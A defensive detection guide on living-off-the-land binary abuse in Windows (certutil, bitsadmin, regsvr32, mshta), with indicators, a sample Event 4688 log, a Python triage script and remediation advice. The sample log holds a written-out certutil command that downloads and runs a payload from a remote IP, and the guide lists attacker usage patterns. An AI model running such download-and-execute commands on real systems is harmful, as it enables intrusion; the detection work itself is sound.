EventPeeker

Living-Off-the-Land Binary Abuse (LOLBins)

Living-off-the-land (LOLBin) attacks abuse legitimate Windows binaries — certutil, bitsadmin, regsvr32, mshta, and others — to download payloads, execute code, and evade detection. Because these binaries are signed by Microsoft and expected on every Windows system, traditional signature-based defenses often miss them entirely.

Severity

High

ATT&CK Tactic

Defense Evasion

Common attacker usage

  • Download payloads using certutil -urlcache or bitsadmin /transfer — both are signed Windows tools that proxy HTTP/S requests
  • Execute remote COM scriptlets via regsvr32 /s /i:http://... — bypasses AppLocker and older application whitelisting
  • Run HTML Applications (HTA) via mshta.exe to execute VBScript or JScript from a URL
  • Use rundll32 to execute arbitrary DLLs or JavaScript — commonly used to load Cobalt Strike stagers
  • Run malicious scripts via wscript.exe or cscript.exe from user-writable directories

Investigate immediately if

  • certutil.exe or bitsadmin.exe appear with http:// or https:// in the command line
  • regsvr32.exe is called with a URL argument (scrobj.dll or direct /i:http://...)
  • mshta.exe launches with a URL or javascript: / vbscript: argument
  • rundll32.exe is called with javascript: or an unusual DLL path
  • wscript.exe or cscript.exe executes a .vbs or .js from AppData, Temp, or Downloads

MITRE ATT&CK

Technique

T1218 · System Binary Proxy Execution

Tactic

Defense Evasion


Security Relevance

LOLBin abuse is one of the most effective defense-evasion techniques in the modern threat landscape because it leaves no foreign executable on disk — just legitimate Windows binaries doing unexpected things. APT groups, ransomware operators, and commodity malware routinely use these techniques to bypass endpoint detection, application whitelisting, and perimeter controls. Detection requires command-line logging (Event ID 4688 with ProcessCreationIncludeCmdLine=1) — without it, these attacks are effectively invisible.

Indicators of Malicious Use

  • certutil.exe with -decode, -urlcache, -encode, or any http:// argument
  • bitsadmin.exe with /transfer, /create, /addfile, or /SetNotifyCmdLine
  • regsvr32.exe with /s /i:http (Squiblydoo technique) or scrobj.dll in arguments
  • mshta.exe with a URL, javascript:, or vbscript: argument
  • rundll32.exe calling javascript:, or loading DLLs from user-writable paths
  • wscript.exe or cscript.exe running scripts from AppData, Temp, Downloads, or Public
  • odbcconf.exe with /a {REGSVR ...} — proxy DLL registration
  • Any of the above spawned by Office applications, web browsers, or email clients

Example Log Entry

Log Name: Security
Event ID:  4688
Level:     Information

A new process has been created.

Creator Subject:
  Account Name:   CORP\jsmith
  Account Domain: CORP

Process Information:
  New Process ID:    0x1d4c
  New Process Name:  C:\Windows\System32\certutil.exe
  Creator Process:   C:\Windows\System32\cmd.exe

Process Command Line:
  certutil.exe -urlcache -split -f http://192.168.45.10/payload.exe C:\Users\Public\svc.exe

[Followed shortly by:]

Event ID:  4688
New Process Name:  C:\Users\Public\svc.exe
Creator Process:   C:\Windows\System32\cmd.exe

Investigation Steps

  1. Verify command-line logging is enabled — Event 4688 only includes the command line if 'Process Creation' auditing is configured with ProcessCreationIncludeCmdLine=1 in Group Policy. Without this, detection is impossible.
  2. Extract the full command line from Event 4688 and look for URLs, encoded payloads (base64 strings), or unusual file paths in arguments.
  3. Identify the parent process — LOLBin abuse launched from Office, browsers, or email clients strongly indicates a phishing or drive-by initial access.
  4. Check for dropped files — certutil and bitsadmin are commonly used to download payloads. Look for new executables in user-writable directories (AppData, Temp, Downloads, Public) created at the same timestamp.
  5. Look for the subsequent execution — what did the downloaded or decoded file do? Check Event 4688 for new processes started by the LOLBin's parent or by the dropped payload.
  6. Search for network connections at the same timestamp — bitsadmin and certutil make outbound HTTP/S requests. Proxy or firewall logs will show the destination IP and URL.
  7. Check BITS jobs: Get-BitsTransfer -AllUsers — malicious BITS jobs may persist even after the initial command completes.
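An added example, not part of this guide or any EventPeeker tooling, that applies the indicator list and investigation steps 2 to 5 to constructed 4688 records: it names each LOLBin indicator that matches, notes when the parent is an Office, browser or mail client, takes the download destination from a certutil or bitsadmin command line, and pairs it with the later process creation that ran the dropped file. The ProcEvent record, the RISKY_PARENTS set and the sample events are assumptions constructed for the example.

```python
import re
from collections import namedtuple
# One 4688 record (constructed): timestamp, New Process Name, Creator Process, Process Command Line
ProcEvent = namedtuple("ProcEvent", "ts image parent cmdline")
URL = re.compile(r"https?://\S+", re.I)
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.I)
# Parents the guide calls out as strong phishing / drive-by indicators (short illustrative set)
RISKY_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "chrome.exe", "msedge.exe"}
def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def lolbin_indicators(ev):
    """Return the guide's indicator names matching one record; an empty list means nothing suspicious."""
    name, cmd, hits = basename(ev.image), ev.cmdline.lower(), []
    if name == "certutil.exe" and (URL.search(cmd) or any(f in cmd for f in ("-urlcache", "-decode", "-encode"))):
        hits.append("certutil download/decode")
    if name == "bitsadmin.exe" and any(f in cmd for f in ("/transfer", "/create", "/addfile", "/setnotifycmdline")):
        hits.append("bitsadmin transfer")
    if name == "regsvr32.exe" and ("scrobj.dll" in cmd or "/i:http" in cmd):
        hits.append("regsvr32 scriptlet (Squiblydoo)")
    if name == "mshta.exe" and (URL.search(cmd) or "javascript:" in cmd or "vbscript:" in cmd):
        hits.append("mshta remote or inline script")
    if name == "rundll32.exe" and ("javascript:" in cmd or USER_WRITABLE.search(cmd)):
        hits.append("rundll32 script or user-writable DLL")
    if name in ("wscript.exe", "cscript.exe") and re.search(r"\.(vbs|js)\b", cmd) and USER_WRITABLE.search(cmd):
        hits.append("script host from user-writable path")
    if hits and basename(ev.parent) in RISKY_PARENTS:
        hits.append("spawned by Office, browser or mail client")
    return hits

def triage(events):
    """Investigation steps 2-5: indicators per event, the local file a certutil/bitsadmin download
    dropped (both take the destination as the last argument), and later 4688s that ran that file."""
    findings = {}
    for ev in events:
        hits = lolbin_indicators(ev)
        if not hits:
            continue
        is_dl = basename(ev.image) in ("certutil.exe", "bitsadmin.exe") and URL.search(ev.cmdline)
        dest = ev.cmdline.split()[-1] if is_dl else None
        ran = [e.ts for e in events if dest and e.ts > ev.ts and e.image.lower() == dest.lower()]
        findings[ev.ts] = {"image": basename(ev.image), "indicators": hits, "dropped": dest, "executed_at": ran}
    return findings

# Constructed sample mirroring the guide's example log: the certutil download, then the payload running
SAMPLE = [
    ProcEvent(100, r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
              r"certutil.exe -urlcache -split -f http://192.168.45.10/payload.exe C:\Users\Public\svc.exe"),
    ProcEvent(103, r"C:\Users\Public\svc.exe", r"C:\Windows\System32\cmd.exe", r"C:\Users\Public\svc.exe"),
]
```

Running triage(SAMPLE) yields one finding keyed on the certutil event, carrying the dropped path and the timestamp of the 4688 that executed it; a certutil call that only touches a .cer file produces no indicator, matching the false-positive note below.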


Common False Positives

  • IT administrators using certutil for certificate management — certutil's primary legitimate purpose is certificate operations. Legitimate use will target .cer, .crt, or .pfx files, not executables.
  • Software deployment tools using bitsadmin or BITS for downloads — WSUS, SCCM, and some patch management tools use BITS. Verify the source URL and destination path.
  • Security tools and EDR agents — some endpoint security products use signed Windows binaries for internal operations. Review the parent process and destination.
  • Developers using mshta for testing HTA applications — rare but possible in development environments. Check the HTA source and whether it contacts external URLs.

Remediation

  • Enable command-line auditing for Event 4688: Group Policy → Computer Configuration → Administrative Templates → System → Audit Process Creation → Include command line in process creation events.
  • Deploy Windows Defender Application Control (WDAC) or AppLocker rules that block certutil, bitsadmin, mshta, and regsvr32 from making network connections or running from user-writable paths.
  • Block outbound HTTP/S from certutil.exe, bitsadmin.exe, and mshta.exe at the perimeter firewall or web proxy — these binaries have no legitimate need to initiate external connections in most environments.
  • Enable Attack Surface Reduction (ASR) rules in Microsoft Defender: 'Block execution of potentially obfuscated scripts' and 'Block Office applications from creating executable content'.
  • Restrict script execution policy via Group Policy — prevent wscript.exe and cscript.exe from running .vbs and .js files from user-writable locations.
  • Deploy Sysmon with a rule set (e.g. SwiftOnSecurity config) — provides much richer process creation and network connection logging than native Windows auditing.

Related Event IDs

4688 · Process creation — LOLBin execution with command-line arguments
4689 · Process exit — pair with 4688 to understand execution duration
4663 · Object access — files written by the LOLBin to disk
4104 · PowerShell script block — scripts run after LOLBin delivery
